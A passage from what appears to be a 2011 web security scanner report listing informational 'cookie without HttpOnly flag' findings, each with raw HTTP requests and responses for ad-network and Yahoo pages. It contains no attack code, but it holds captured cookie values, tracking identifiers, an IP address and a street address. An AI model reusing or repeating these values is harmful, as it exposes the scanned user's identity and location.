myc_s=d=nOa115432jLC_cSLwuu_lf4CTd6wQPmHPCA2hP1vQO94THfsuViFbH9mcyI_cr0GP9r0rbetQe8z05xV0Z2o4v5lJRZq8SECI0sk60MsqlHumxoaEan_CngqSvJugqGvksvtgsUNoY8vL9_WpFoPYA5m101VjH_Pitvzb_GmYa019lCJFv2m_NEOXzQtq88.KW.F1SW5xpMo5OCinwcf0GL2rIl_kSrzrG.HFpDrEfGrrxXa18kfeCfkRX1QRTUCkse0NtJ63f4d2bPZUUp6IKxQ.C2G0OdbxWhxiMkjTmH0JcuI3jcyENUWnjYBj6dd7nxfqt_liAQa2Fwu9j37WJ.uQsq4ifKSL7i_6ftSyEgKdKhwyM6bY_BY.daS4egAYqHbhrR.g97x2ik02QNDK01volhxF5DES8RS6IaT3J4kbDJKNubXAO6Y_l02pZGmiRaKpmpaztnZZY_uwIWGVCTbDHJPpswsjyjP5Dcq0XIm1tkmPP2OrOSbmUWmft2JHYnOn2TmUuDZHZWA1X0RI4H8QHD39X5im7fBk7hIskxCD0kfgLG3KUPqJu.EsvuVefk.._mcFbJ0Wtxy4x9x_jt54PqFCbOQoObGtvHFevI25eKgw6kz6OQKwmHA10QFFqyBvqy0abhz9r_HlgX7F6z61jFeREhCedssKNsUjJ.qOvQ39C..SfEF80O7fwUowNksedhAHbANPtVyXDhD0ZlbIeUp_PVZhGmurZ9iB1nbQWrdgzuEOPhhoCHVq3E8RvzDzDJPZ198uGLqzzGoqyyNVyl8yPvY.IGWZBbEWla74QSx6sa5J8C6Z2ckXD_vcuihU_amd6fVcjiXIMr4cHxHd2h.1zlF4gU-&v=2; MYTMI=4; MYTCK=AgBOZhIQAE%2FJEABiqRAAIboQAHvh

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6IjAzZzRmbnA3NmM0aTAiO3M6MjoibXQiO2k6MTMxNTMxMjE5Mjt9; expires=Fri, 06-Sep-2013 12:29:52 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:52 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: U_mtupes=deleted; expires=Mon, 06-Sep-2010 12:29:51 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/json; charset=utf-8
Content-Length: 166

[{"_status":1,"html":null,"_error":"We noticed you may have signed in or signed out in another window. Click OK to reload your page.","_errorCode":2048,"_txnid":"2"}]

10.74. http://gdyn.pgatour.com/1.1/1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gdyn.pgatour.com
Path:   /1.1/1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1.1/1.gif?1315331430246 HTTP/1.1
Host: gdyn.pgatour.com
Proxy-Connection: keep-alive
Referer: http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:30 GMT
Server: Apache
X-Netacuity: success
Set-Cookie: adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; expires=Wed, 07 Sep 2011 15:50:30 GMT; domain=.pgatour.com; path=/
Set-Cookie: adDEon=true; expires=Wed, 07 Sep 2011 15:50:30 GMT; domain=.pgatour.com; path=/
Last-Modified: Wed, 01 Dec 2004 19:27:52 GMT
ETag: "d0a8dd-2b-e6d33e00"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: max-age=60, private
Expires: Tue, 06 Sep 2011 12:51:30 GMT
P3P: CP="NOI DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI COM NAV STA"
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.75. http://int.teracent.net/tase/int

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=161&fmt=redirect&sec=0&d4=0 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315258459362_65704651_as3105_imp|374#1315258459362_65704651_as3105_imp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p161r=b$u-32#A.8GZ|g-yWB#1.8GZ|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:44:43 GMT; Path=/
Set-Cookie: imp=a$le#1315313083617_171501150_ap3100_int|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:44:43 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Tue, 06 Sep 2011 12:44:42 GMT
Connection: close

GIF89a.............!.......,...........D..;

10.76. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landing.optionshouse.com
Path:   /rate/395/yhofin/qbttn/stk_oldgb/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk HTTP/1.1
Host: landing.optionshouse.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602; domain=optionshouse.com; expires=Wed, 05-Sep-2012 05:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:14 GMT
Content-Length: 14053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head id="ball_page_ti
...[SNIP]...

10.77. http://maps.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.yahoo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: maps.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _ygms=z^6&l^350%20Sansome%20Street%20San%20Francisco%20CA%2094104%20us&v^1&c^37.793676%7C-122.401025; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:56 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Expires: Wed, 16 Mar 1966 12:00:00 GMT
Cache-Control: must-revalidate
Pragma: no-cache
Set-Cookie: _ygms=z%5E6%26l%5E350+Sansome+Street+San+Francisco+CA+94104+us%26v%5E1%26c%5E37.793676%7C-122.401025; expires=Thu, 06-Oct-2011 12:44:56 GMT; path=/; domain=.maps.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18922

<html><head><title>Yahoo! Maps, Driving Directions, and Traffic</title><meta name="DESCRIPTION"content="Yahoo! Maps, Driving Directions, Satellite View and Traffic. Rated the best online mapping exper
...[SNIP]...

10.78. http://marketing.aptela.com/js/mktFormSupport.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://marketing.aptela.com
Path:   /js/mktFormSupport.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/mktFormSupport.js HTTP/1.1
Host: marketing.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=LKZYVMSBw1CYWW; path=/
Date: Tue, 06 Sep 2011 11:52:00 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 02:03:20 GMT
ETag: "ea801b-3851-4a7853cd62a00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 14417
Content-Type: application/x-javascript

/* Copyright (c) 2006-2007, Marketo, Inc. All rights reserved. */
var Mkto = {
kv : [],
kvUrl : null,
kvReferrer : null,
pageSubmitted: false
};

Mkto.parseUrlParams = function(url) {
var qu
...[SNIP]...

10.79. http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://new.music.yahoo.com
Path:   /blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/ HTTP/1.1
Host: new.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; YMP_VOLUME=0.5; mlap_us=%7B%22d%22%3A%5B%5B%22yahooVideosContainer%22%2C%22ySearch%22%2C%22yMusicImages%22%2C%22yahooAlbums%22%2C%22yNews%22%2C%22Youtube%22%5D%2C%5B%22yahooTracksPopular%22%2C%22yConcerts%22%2C%22lastfm%22%2C%22pandora%22%2C%22flickr%22%2C%22iTunes%22%2C%22Amazon%22%5D%5D%2C%22m%22%3A%22%22%2C%22i%22%3A%22us%22%2C%22v%22%3A%221.1%22%2C%22c%22%3A0%7D; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:34 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Cache-Control: private
Content-Type: text/html;charset=utf-8
X-Cache: MISS from new.music.yahoo.com
Connection: close
Content-Length: 103483

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script>
rtTop = Number(new Date());
</script>
<script type="text/javascript" src="http://l
...[SNIP]...

10.80. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/15925-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/15925-15.js?cb=0.7626287858001888&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=3;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:54 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:54 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 13:45:54 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^32; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69245; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3172566.js^2^1315313154^1315313154&638177.js^10^1315313154^1315313153&3218925.js^1^1315313153^1315313153; expires=Tue, 13-Sep-2011 12:45:54 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2081

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3172566"
...[SNIP]...

10.81. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/15925-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/15925-2.js?cb=0.8956789178773761&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=4;sz=728x90;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^3^1315313132^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^1; csi2=638178.js^1^1315313134^1315313134&3172565.js^1^1315313133^1315313133; rdk=6348/9844; rdk15=0; ses15=9844^2; csi15=638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:52 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:50:52 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 13:50:52 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^3; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=68947; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3218923.js^1^1315313452^1315313452&3172565.js^2^1315313133^1315313452&638178.js^1^1315313134^1315313134; expires=Tue, 13-Sep-2011 12:50:52 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1829

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3218923"
...[SNIP]...

10.82. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/16043-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/16043-15.js?cb=0.7354257416445762&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:53 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:53 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 13:45:53 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69246; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=638177.js^2^1315313132^1315313153; expires=Tue, 13-Sep-2011 12:45:53 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1843

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "638177" +
...[SNIP]...

10.83. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/16043-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/16043-2.js?cb=0.6071016045752913&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^3^1315313132^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6348/9844; rdk15=0; ses15=9844^1; csi15=638177.js^1^1315313132^1315313132

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:57 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=1; expires=Tue, 06-Sep-2011 13:45:57 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69242; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3172565.js^2^1315313133^1315313157&638178.js^1^1315313134^1315313134; expires=Tue, 13-Sep-2011 12:45:57 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2069

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3172565"
...[SNIP]...

10.84. http://optimized-by.rubiconproject.com/a/dk.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=x3068d5.js&size_id=2&account_id=6348&site_id=9844&size=728x90&cb=0.8285465578082949 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^3^1315313132^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk15=0; ses15=9844^1; csi15=638177.js^1^1315313132^1315313132; rdk=6348/9844; rdk2=0; ses2=9844^1; csi2=3172565.js^1^1315313133^1315313133

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:59 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:59 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=2; expires=Tue, 06-Sep-2011 13:45:59 GMT; max-age=10; path=/; domain=.rubiconproject.com
